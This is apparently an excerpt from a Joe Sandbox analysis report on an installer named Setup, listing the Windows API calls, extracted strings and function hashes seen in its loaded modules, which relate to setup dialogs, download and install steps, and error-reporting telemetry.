                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: ImageLoadMessageSend$Item$H_prolog3$AppendFileModuleNamePath
                                                                                              • String ID: graphics\setup.ico$print.ico$save.ico$stop.ico$warn.ico
                                                                                              • API String ID: 1194837009-3827646805
                                                                                              • Opcode ID: 6fb6e422a4a0a88f874a09be866ae824d3216167440ac1c935d55fa3a2677ed6
                                                                                              • Instruction ID: a97210b1cd7547406ec8915121c286c02e6691980646e38f1dfce2bccf25f707
                                                                                              • Opcode Fuzzy Hash: 6fb6e422a4a0a88f874a09be866ae824d3216167440ac1c935d55fa3a2677ed6
                                                                                              • Instruction Fuzzy Hash: 59413E7564470AAFEF20ABA0CC46FAA77A9BF05F14F000815F266AA1D1DBB1E4609F10
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6395A815
                                                                                              • GetDlgItem.USER32(?,00000065), ref: 6395A87D
                                                                                              • SetWindowTextW.USER32(00000000,?), ref: 6395A885
                                                                                              • GetDlgItem.USER32(?,00000069), ref: 6395A8AD
                                                                                              • SetWindowTextW.USER32(00000000,?), ref: 6395A8B5
                                                                                              • PostMessageW.USER32(?,00000691,80004005,00000000), ref: 6395A8E9
                                                                                              • PostMessageW.USER32(?,00000691,77777777,00000000), ref: 6395A944
                                                                                              • GetParent.USER32(00000002), ref: 6395A9F5
                                                                                              • GetParent.USER32(00000002), ref: 6395AA0B
                                                                                              • SetWindowLongW.USER32(00000002,000000F4,0000006A), ref: 6395AA35
                                                                                              • GetParent.USER32(00000002), ref: 6395AA40
                                                                                              • SetWindowTextW.USER32(00000000,?), ref: 6395AA48
                                                                                              • PostMessageW.USER32(00000002,000006F5,00000000,00000000), ref: 6395AA59
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$MessageParentPostText$Item$H_prolog3Long
                                                                                              • String ID: All buttons hidden in passive mode$wwww
                                                                                              • API String ID: 3938074132-3958308462
                                                                                              • Opcode ID: 6addeff4260855a9b05cd14a5bbbf60fd32c78ff78280ddeaf6710b09bd9484c
                                                                                              • Instruction ID: 667f0c8e95ac36903b3fffb25b96dc0b67f6f440eabae4af1b9c11d4a9a11ecb
                                                                                              • Opcode Fuzzy Hash: 6addeff4260855a9b05cd14a5bbbf60fd32c78ff78280ddeaf6710b09bd9484c
                                                                                              • Instruction Fuzzy Hash: 99817D75600606DFDB04EFA4C888A9DBBB5FF0AB18F140558F655AB2A1CB31EC25CF91
                                                                                              APIs
                                                                                              • CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000003,80000080,00000000), ref: 6C5E672A
                                                                                              • GetLastError.KERNEL32 ref: 6C5E6738
                                                                                                • Part of subcall function 6C5E5F11: EtwTraceMessage.NTDLL ref: 6C5E5F26
                                                                                              • CreateFileMappingW.KERNEL32(00000000,00000000,00000004,00000000,00000078,00000000), ref: 6C5E677E
                                                                                              • GetLastError.KERNEL32 ref: 6C5E678B
                                                                                                • Part of subcall function 6C5E99F8: EtwTraceMessage.NTDLL ref: 6C5E9A13
                                                                                              • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000078), ref: 6C5E67CC
                                                                                              • GetLastError.KERNEL32 ref: 6C5E67D8
                                                                                              • UnmapViewOfFile.KERNEL32(00000000), ref: 6C5E68A7
                                                                                              • CloseHandle.KERNEL32(?), ref: 6C5E68BB
                                                                                              • CloseHandle.KERNEL32(?), ref: 6C5E68C0
                                                                                              • SetLastError.KERNEL32(00000000), ref: 6C5E68C4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorFileLast$CloseCreateHandleMessageTraceView$MappingUnmap
                                                                                              • String ID: MSQM
                                                                                              • API String ID: 3767376415-2366479917
                                                                                              • Opcode ID: f980144b8ec9b65ebcfcecfa98fb79c246e0b6ed976cf8004bb4c98fd6dd2b24
                                                                                              • Instruction ID: 4c7db412a4fa23db955ad5a41fcd75cb358d049da76e8b1a4b9463647d73ec75
                                                                                              • Opcode Fuzzy Hash: f980144b8ec9b65ebcfcecfa98fb79c246e0b6ed976cf8004bb4c98fd6dd2b24
                                                                                              • Instruction Fuzzy Hash: 7C513331604348AFDB449F62CC94F8E3BF9BB49388F550465FA21DA9A1CB70D8858F14
                                                                                              APIs
                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 6394E179
                                                                                              • GetParent.USER32 ref: 6394E18B
                                                                                              • GetWindow.USER32(?,00000004), ref: 6394E197
                                                                                              • GetWindowRect.USER32(?,?), ref: 6394E1A5
                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 6394E1BB
                                                                                              • MonitorFromWindow.USER32(?,00000002), ref: 6394E1DA
                                                                                              • GetMonitorInfoW.USER32(00000000,?), ref: 6394E1F7
                                                                                              • GetWindowRect.USER32(?,?), ref: 6394E220
                                                                                              • SetWindowPos.USER32(?,00000000,?,?,000000FF,000000FF,00000015,?,00000000,?,00000002,?,?,?,?,?), ref: 6394E2C7
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$LongMonitorRect$FromInfoParent
                                                                                              • String ID: (
                                                                                              • API String ID: 1468510684-3887548279
                                                                                              • Opcode ID: 7cea98c33b06495dcb08f262fa224e50f8a8109ca1092eaaf8d6bb2efd3fe0ff
                                                                                              • Instruction ID: 5be0f7bfb7d27671c9edf6757f76480b05188e4ab8c2d75c305af79aaaf5d4a6
                                                                                              • Opcode Fuzzy Hash: 7cea98c33b06495dcb08f262fa224e50f8a8109ca1092eaaf8d6bb2efd3fe0ff
                                                                                              • Instruction Fuzzy Hash: CD516D71A0421A9FDB10DFA8CD88A9EBBB9EF4A754F141124F901F7296E760ED04CF50
                                                                                              APIs
                                                                                              • GetTickCount.KERNEL32 ref: 6C5DDA74
                                                                                              • GetTickCount.KERNEL32 ref: 6C5DDA8F
                                                                                              • GlobalFree.KERNEL32(?), ref: 6C5DDB44
                                                                                              • ImpersonateLoggedOnUser.ADVAPI32(?,0000004C,6C5DC228,?,?,00000001,?,?,00000000,?,?,?,00000000), ref: 6C5E2A06
                                                                                              • GetLastError.KERNEL32(?,?,?,00000000), ref: 6C5E2A10
                                                                                              • RevertToSelf.ADVAPI32(?,?,?,00000000), ref: 6C5E2CBB
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: CountTick$ErrorFreeGlobalImpersonateLastLoggedRevertSelfUser
                                                                                              • String ID: http%s://%s/%s
                                                                                              • API String ID: 1105026337-335662767
                                                                                              • Opcode ID: 458f46670aa01c1132a9bb050dd685857329ae0a79a01c809fd81db90ce44ee6
                                                                                              • Instruction ID: b0335586ce7c16906a7fd4a7060f9383c652a330761e67f671035ed54465923b
                                                                                              • Opcode Fuzzy Hash: 458f46670aa01c1132a9bb050dd685857329ae0a79a01c809fd81db90ce44ee6
                                                                                              • Instruction Fuzzy Hash: 7DE1C170A0134ADBDB05DF98CC84F9E7BB8FB89708F16405AE9109BA64C770E844CF64
                                                                                              APIs
                                                                                              • ResetEvent.KERNEL32(?,0000003C), ref: 6C5DC165
                                                                                              • ResetEvent.KERNEL32(?), ref: 6C5DC16E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: EventReset
                                                                                              • String ID: MSDW
                                                                                              • API String ID: 2632953641-1205502275
                                                                                              • Opcode ID: 2554c19b85bb72fd43a3c7f986337ebc4d9689e83c8e34dd733ef83465013a43
                                                                                              • Instruction ID: 79cff1b1dc16b0990956b301da721d9bac436a17eea8a909f90b3f4afd563762
                                                                                              • Opcode Fuzzy Hash: 2554c19b85bb72fd43a3c7f986337ebc4d9689e83c8e34dd733ef83465013a43
                                                                                              • Instruction Fuzzy Hash: 1DD1B170641344EFDB01EFA9CC84FAA3BB9BB08708F26051AF556D6AA1D771E844CF18
                                                                                              APIs
                                                                                              • GetDlgItem.USER32(?,00000065), ref: 639502F9
                                                                                                • Part of subcall function 6394EDAE: SetWindowTextW.USER32(?,?), ref: 6394EDC5
                                                                                              • GetDlgItem.USER32(?,00000066), ref: 6395030A
                                                                                              • GetDlgItem.USER32(?,00000069), ref: 6395031E
                                                                                              • ShowWindow.USER32(?,00000000), ref: 6395033A
                                                                                              • SendMessageW.USER32(?,000000F5,00000000,00000000), ref: 63950382
                                                                                              • SetWindowTextW.USER32(?,00000000), ref: 639503B6
                                                                                              • GetDlgItem.USER32(?,00000065), ref: 639503C1
                                                                                              • EnableWindow.USER32(?,00000000), ref: 639503EB
                                                                                              • SetWindowTextW.USER32(?,00000000), ref: 63950409
                                                                                              • GetDlgItem.USER32(?,00000066), ref: 63950414
                                                                                              • EnableWindow.USER32(?,00000000), ref: 6395043E
                                                                                              • SetDlgItemTextW.USER32(?,00000069,00000000), ref: 63950462
                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 6395048B
                                                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 6395049A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Item$Text$EnableLong$MessageSendShow
                                                                                              • String ID:
                                                                                              • API String ID: 3359463025-0
                                                                                              • Opcode ID: a2fb37a4e05d7b4effab5ee1fcfd4b1066fb040a9e30427b78ee5cd402ba42e9
                                                                                              • Instruction ID: 66717a9d0d91457cbb02056bab106e9c2e3bcce41259910090dd2fe28210f687
                                                                                              • Opcode Fuzzy Hash: a2fb37a4e05d7b4effab5ee1fcfd4b1066fb040a9e30427b78ee5cd402ba42e9
                                                                                              • Instruction Fuzzy Hash: 4D613739600600AFDB14EF64C888F99BBF6BF8A714F1045A8F656DB3A1DB71A954CF00
                                                                                              APIs
                                                                                              • GetParent.USER32(?), ref: 6395D38D
                                                                                                • Part of subcall function 6394E153: GetWindowLongW.USER32(?,000000F0), ref: 6394E179
                                                                                                • Part of subcall function 6394E153: GetParent.USER32 ref: 6394E18B
                                                                                                • Part of subcall function 6394E153: GetWindowRect.USER32(?,?), ref: 6394E1A5
                                                                                                • Part of subcall function 6394E153: GetWindowLongW.USER32(?,000000F0), ref: 6394E1BB
                                                                                                • Part of subcall function 6394E153: MonitorFromWindow.USER32(?,00000002), ref: 6394E1DA
                                                                                              • SetWindowTextW.USER32(?,?), ref: 6395D3A3
                                                                                                • Part of subcall function 6395D149: __EH_prolog3.LIBCMT ref: 6395D150
                                                                                                • Part of subcall function 6395D149: LoadImageW.USER32(00000000,?,00000001,00000020,00000020,00000010), ref: 6395D198
                                                                                                • Part of subcall function 6395D149: SendMessageW.USER32(?,00000080,00000001,00000000), ref: 6395D1AF
                                                                                                • Part of subcall function 6395D149: LoadImageW.USER32(00000000,?,00000001,00000020,00000020,00000010), ref: 6395D1E4
                                                                                                • Part of subcall function 6395D149: GetDlgItem.USER32(?,00000068), ref: 6395D1F5
                                                                                                • Part of subcall function 6395D149: SendMessageW.USER32(00000000,00000170,?,00000000), ref: 6395D209
                                                                                                • Part of subcall function 6395D149: LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 6395D231
                                                                                                • Part of subcall function 6395D149: GetDlgItem.USER32(?,00000069), ref: 6395D242
                                                                                                • Part of subcall function 6395D149: SendMessageW.USER32(00000000,000000F7,00000001,?), ref: 6395D256
                                                                                                • Part of subcall function 6395D149: LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 6395D27E
                                                                                                • Part of subcall function 6395D073: __EH_prolog3.LIBCMT ref: 6395D07A
                                                                                                • Part of subcall function 6395D073: SetDlgItemTextW.USER32(?,00000065,?), ref: 6395D130
                                                                                              • GetDlgItem.USER32(?,00000066), ref: 6395D3B9
                                                                                                • Part of subcall function 63950B11: SetWindowLongW.USER32(?,000000FC,?), ref: 63950B2D
                                                                                              • SendMessageW.USER32(?,00000445,00000000,04000000), ref: 6395D3E4
                                                                                                • Part of subcall function 6395D86C: _memset.LIBCMT ref: 6395D8B6
                                                                                                • Part of subcall function 6395D86C: SendMessageW.USER32(?,0000043A,00000001,?), ref: 6395D8D9
                                                                                              • SendMessageW.USER32(?,000000CF,00000001,00000000), ref: 6395D3FC
                                                                                                • Part of subcall function 6395CFA5: __EH_prolog3.LIBCMT ref: 6395CFAC
                                                                                                • Part of subcall function 6395CFA5: GetDlgItem.USER32(?,00000067), ref: 6395D018
                                                                                                • Part of subcall function 6395CFA5: SetWindowLongW.USER32(?,000000FC,?), ref: 6395D041
                                                                                                • Part of subcall function 6395CFA5: SetDlgItemTextW.USER32(?,00000067,?), ref: 6395D05A
                                                                                                • Part of subcall function 6395D2BF: __EH_prolog3.LIBCMT ref: 6395D2C6
                                                                                                • Part of subcall function 6395D2BF: SetDlgItemTextW.USER32(?,0000000B,00000000), ref: 6395D2FC
                                                                                                • Part of subcall function 6395D2BF: SetDlgItemTextW.USER32(?,00000008,00000000), ref: 6395D33B
                                                                                              • GetDlgItem.USER32(?,0000000B), ref: 6395D424
                                                                                              • EnableWindow.USER32(00000000,00000000), ref: 6395D42D
                                                                                              • GetDlgItem.USER32(?,00000069), ref: 6395D482
                                                                                              • GetDlgItem.USER32(?,0000006A), ref: 6395D4D5
                                                                                              • PostMessageW.USER32(?,000006F5,00000000,00000000), ref: 6395D53E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: Item$Window$Message$Send$Text$H_prolog3ImageLoadLong$Parent$EnableFromMonitorPostRect_memset
                                                                                              • String ID: IDS_PRINT$IDS_SAVE
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 63965A8C
                                                                                              • GetLastError.KERNEL32 ref: 63965AFF
                                                                                                • Part of subcall function 6395F21D: _wcsnlen.LIBCMT ref: 6395F1B2
                                                                                              • GetLastError.KERNEL32 ref: 63965B39
                                                                                              • GetLastError.KERNEL32 ref: 63965BC8
                                                                                              • PathStripPathW.SHLWAPI(?), ref: 63965BFB
                                                                                                • Part of subcall function 639681DE: _memcpy_s.LIBCMT ref: 63968224
                                                                                              • CloseHandle.KERNEL32(?), ref: 63965C85
                                                                                              • GetLastError.KERNEL32 ref: 63965C8D
                                                                                              Strings
                                                                                              • GetProcessImageFileName, xrefs: 63965BD1
                                                                                              • psapi.dll, xrefs: 63965B62
                                                                                              • EnumProcessModules failed with error %u, will try GetProcessImageFileName, xrefs: 63965B43
                                                                                              • OpenProcess, xrefs: 63965C96
                                                                                              • GetModuleBaseName, xrefs: 63965B08
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$Path$CloseH_prolog3_catchHandleStrip_memcpy_s_wcsnlen
                                                                                              • String ID: EnumProcessModules failed with error %u, will try GetProcessImageFileName$GetModuleBaseName$GetProcessImageFileName$OpenProcess$psapi.dll
                                                                                              APIs
                                                                                              • ShowWindow.USER32(?,00000000), ref: 6395AAF3
                                                                                              • IsWindow.USER32(?), ref: 6395AB3B
                                                                                              • GetDlgItem.USER32(FFFFFF96,00000068), ref: 6395ABA3
                                                                                              • SetWindowTextW.USER32(00000000,?), ref: 6395ABAB
                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6395ABC6
                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 6395ABF2
                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6395ABF5
                                                                                              • LeaveCriticalSection.KERNEL32(6395A159,?), ref: 6395AC04
                                                                                              • IsWindow.USER32(?), ref: 6395AC32
                                                                                              Strings
                                                                                              • Launching Install operation. Download operation is completed., xrefs: 6395AB70
                                                                                              • Download failed. No performer will be called., xrefs: 6395AB21
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: CriticalSectionWindow$EnterLeave$ItemShowText
                                                                                              • String ID: Download failed. No performer will be called.$Launching Install operation. Download operation is completed.
                                                                                              APIs
                                                                                              • EnterCriticalSection.KERNEL32(63982FC8,00000000,?,00000000), ref: 639652B7
                                                                                              • GetClassInfoExW.USER32 ref: 639652F1
                                                                                              • GetClassInfoExW.USER32(?,?), ref: 63965306
                                                                                              • LeaveCriticalSection.KERNEL32(63982FC8), ref: 6396530D
                                                                                              • LoadCursorW.USER32(?,?), ref: 63965352
                                                                                              • swprintf.LIBCMT ref: 6396537C
                                                                                              • GetClassInfoExW.USER32(?,00000000,?), ref: 6396539F
                                                                                              • RegisterClassExW.USER32(?), ref: 639653AF
                                                                                              • LeaveCriticalSection.KERNEL32(63982FC8), ref: 639653DF
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: Class$CriticalInfoSection$Leave$CursorEnterLoadRegisterswprintf
                                                                                              • String ID: 0$ATL:%p
                                                                                              APIs
                                                                                                • Part of subcall function 6395A214: __CxxThrowException@8.LIBCMT ref: 6395A228
                                                                                              • GetDlgItem.USER32(?,00000066), ref: 6395A6E2
                                                                                              • SetPropW.USER32(00000000,RotatingIconDisplayTHIS,?), ref: 6395A6F1
                                                                                              • SetTimer.USER32(?,00000002,000003E8,Function_0001A051), ref: 6395A70B
                                                                                              • GetDlgItem.USER32(?,0000006A), ref: 6395A721
                                                                                              • SetPropW.USER32(00000000,RotatingIconDisplayTHIS,?), ref: 6395A730
                                                                                              • GetDlgItem.USER32(?,00000067), ref: 6395A740
                                                                                              • GetDlgItem.USER32(?,0000006B), ref: 6395A751
                                                                                              Strings
                                                                                              • Launching Download operation. Install operation will follow after download is complete., xrefs: 6395A7D8
                                                                                              • Item(s) availability state is "Error". Exiting setup., xrefs: 6395A7E2
                                                                                              • RotatingIconDisplayTHIS, xrefs: 6395A6EB, 6395A72A
                                                                                              • Launching Download and Install operations simultaneously., xrefs: 6395A7C2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: Item$Prop$Exception@8ThrowTimer
                                                                                              • String ID: Item(s) availability state is "Error". Exiting setup.$Launching Download and Install operations simultaneously.$Launching Download operation. Install operation will follow after download is complete.$RotatingIconDisplayTHIS
                                                                                              APIs
                                                                                              • EnterCriticalSection.KERNEL32(00000030,?,00000000), ref: 6C5DBB79
                                                                                              • GetCurrentProcess.KERNEL32(?,00100000,00000000,00000000,?,00000000), ref: 6C5DBB9A
                                                                                              • GetCurrentProcess.KERNEL32(?,00000000,?,00000000), ref: 6C5DBBA0
                                                                                              • DuplicateHandle.KERNEL32(00000000,?,00000000), ref: 6C5DBBA3
                                                                                              • LeaveCriticalSection.KERNEL32(00000030,?,00000000), ref: 6C5DBBBC
                                                                                              • GetLastError.KERNEL32(?,00000000), ref: 6C5E00A1
                                                                                              • SetEvent.KERNEL32(?,Upload Completion,00000001,?,00000000,?,?,00000000), ref: 6C5E0100
                                                                                              • CloseHandle.KERNEL32(?,00000000), ref: 6C5E012A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: CriticalCurrentHandleProcessSection$CloseDuplicateEnterErrorEventLastLeave
                                                                                              • String ID: Upload Completion$Upload Thread Exit
                                                                                              APIs
                                                                                              • GetTempFileNameW.KERNEL32(00000000,WER,00000000,?,00000000,00000000,?), ref: 6C5D5756
                                                                                              • DeleteFileW.KERNEL32(?), ref: 6C5D5774
                                                                                              • CreateFileW.KERNEL32(?,C0000000,?,00000104,00000002,?,00000000), ref: 6C5D57B6
                                                                                              • GetLongPathNameW.KERNEL32(?,?,00000000), ref: 6C5D57D7
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 6C5D57F9
                                                                                                • Part of subcall function 6C5D583D: GetTempPathW.KERNEL32(00000000,00000000,00000000,00000000), ref: 6C5D5875
                                                                                                • Part of subcall function 6C5D583D: GetLongPathNameW.KERNEL32(00000000,?,00000104), ref: 6C5D58A7
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: FileNamePath$LongTemp$CloseCreateDeleteHandle
                                                                                              • String ID: 2$WER
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 6C5E634C
                                                                                              • GetLastError.KERNEL32 ref: 6C5E63D4
                                                                                              • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(D:(A;OICI;GA;;;SY)(A;OICI;GA;;;BA)(A;OICI;GR;;;WD),00000001,?,00000000), ref: 6C5E63FA
                                                                                              • GetLastError.KERNEL32(D:(A;OICI;GA;;;SY)(A;OICI;GA;;;BA)(A;OICI;GR;;;WD),00000001,?,00000000), ref: 6C5E6406
                                                                                                • Part of subcall function 6C5E5F11: EtwTraceMessage.NTDLL ref: 6C5E5F26
                                                                                                • Part of subcall function 6C5E7DFE: RegCloseKey.ADVAPI32(00000001,?,?,?,6C5E6448,80000002,Software\Microsoft\SQMClient,0000000C,MachineId,?,D:(A;OICI;GA;;;SY)(A;OICI;GA;;;BA)(A;OICI;GR;;;WD),00000001,?,00000000), ref: 6C5E7F28
                                                                                              • LocalFree.KERNEL32(00000000,MachineId,?,D:(A;OICI;GA;;;SY)(A;OICI;GA;;;BA)(A;OICI;GR;;;WD),00000001,?,00000000), ref: 6C5E6486
                                                                                              • SetLastError.KERNEL32(0000054F,MachineId,?,D:(A;OICI;GA;;;SY)(A;OICI;GA;;;BA)(A;OICI;GR;;;WD),00000001,?,00000000), ref: 6C5E648F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$DescriptorSecurity$CloseConvertFreeLocalMessageStringTracememset
                                                                                              • String ID: D:(A;OICI;GA;;;SY)(A;OICI;GA;;;BA)(A;OICI;GR;;;WD)$MachineId$Software\Microsoft\SQMClient$W
                                                                                              • API String ID: 2649899325-766622882
                                                                                              • Opcode ID: e7e296a3a4675f0c835f550e71779207a3a29053b0f4b5dc83944df730e91a5c
                                                                                              • Instruction ID: 093d06db5dbb743656d35eec4700df9939e3aeab292ad8eaef0a9811247b6e55
                                                                                              • Opcode Fuzzy Hash: e7e296a3a4675f0c835f550e71779207a3a29053b0f4b5dc83944df730e91a5c
                                                                                              • Instruction Fuzzy Hash: C7415B71A00388AFDB40DFD4CCC4F9E7BF9AB48388F550429E615EB951D771A9888F15
                                                                                              APIs
                                                                                              • __EH_prolog3_GS.LIBCMT ref: 639609E7
                                                                                              • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 63960A02
                                                                                                • Part of subcall function 6395E8E8: __EH_prolog3.LIBCMT ref: 6395E8EF
                                                                                              • MapDialogRect.USER32(?,00000000), ref: 63960AEE
                                                                                              • ShowWindow.USER32(00000000,00000001,00000000,?,?,?,40000000,?,?,00000000), ref: 63960B68
                                                                                              • SendMessageW.USER32(00000000,00000030,?,00000001), ref: 63960B78
                                                                                                • Part of subcall function 6394F589: SendMessageW.USER32(?,00000031,00000000,00000000), ref: 6394F5AC
                                                                                                • Part of subcall function 6394F589: GetObjectW.GDI32(00000000,0000005C,?), ref: 6394F5B5
                                                                                                • Part of subcall function 6394F589: CreateFontIndirectW.GDI32(?), ref: 6394F600
                                                                                                • Part of subcall function 6394F589: SendMessageW.USER32(?,00000030,00000000,00000001), ref: 6394F610
                                                                                              • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000010), ref: 63960C2A
                                                                                              • SendMessageW.USER32(00000000,00000170,?,00000000), ref: 63960C70
                                                                                              • LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00000010), ref: 63960CA3
                                                                                                • Part of subcall function 6395F933: SendMessageW.USER32(?,00000172,00000000,?), ref: 6395F944
                                                                                              • MapDialogRect.USER32(?,00000000), ref: 63960DAB
                                                                                              • SendMessageW.USER32(?,00000030,?,00000001), ref: 63960E0A
